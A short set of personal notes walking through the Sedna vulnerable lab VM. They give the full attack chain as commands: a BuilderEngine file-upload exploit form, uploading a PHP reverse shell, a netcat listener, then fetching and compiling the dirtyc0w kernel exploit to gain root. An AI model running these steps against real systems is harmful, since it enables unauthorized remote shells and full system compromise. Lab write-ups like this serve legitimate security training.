These are my notes from running through the Sedna vulnerable VM.
Run discover content in Burp to map the application out. You can also run Nikto to try and find any vulnerabilities.
Observe /license.txt - it will inform us that the target web application is
running BuilderEngine.
Search for an exploit we can use:
searchsploit builderengine
View the source for the exploit:
searchsploit -x 40390
Copy the exploit code into exploit.html:
<html>
<body>
<form
method="post"
action="http://<vulnerable ip>/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data"
>
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
Host it:
python -m SimpleHTTPServer 8000 # make sure exploit.html is in this directory
In a web browser: http://127.0.0.1:8000/exploit.html
Modify the laudanum backdoor to match the IP address and whatever port for our attacker machine. We can get this from here.
Upload laudanum backdoor through exploit.html:
Click Choose File, specify php-reverse-shell.php Click send
Start listener on attacker:
nc -lvp 8888
Initiate connection:
http://<vulnerable ip>/files/php-reverse-shell.php
After getting the reverse shell:
python -c 'import pty;pty.spawn("/bin/bash")' # get real shell
To elevate our privileges, we’ll use dirtyc0w. Get it and compile it:
cd /tmp && wget https://www.exploit-db.com/download/40839 && mv 40839 40839.c && gcc -pthread -o dirty 40839.c -lcrypt
Run it:
./dirty nicepassword
Access the system:
ssh firefart@192.168.1.182
For stability, run this immediately once you’re in:
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
The flags can be found in:
/var/www/flag.txt
/root/flag.txt
/etc/tomcat7/tomcat-users.xml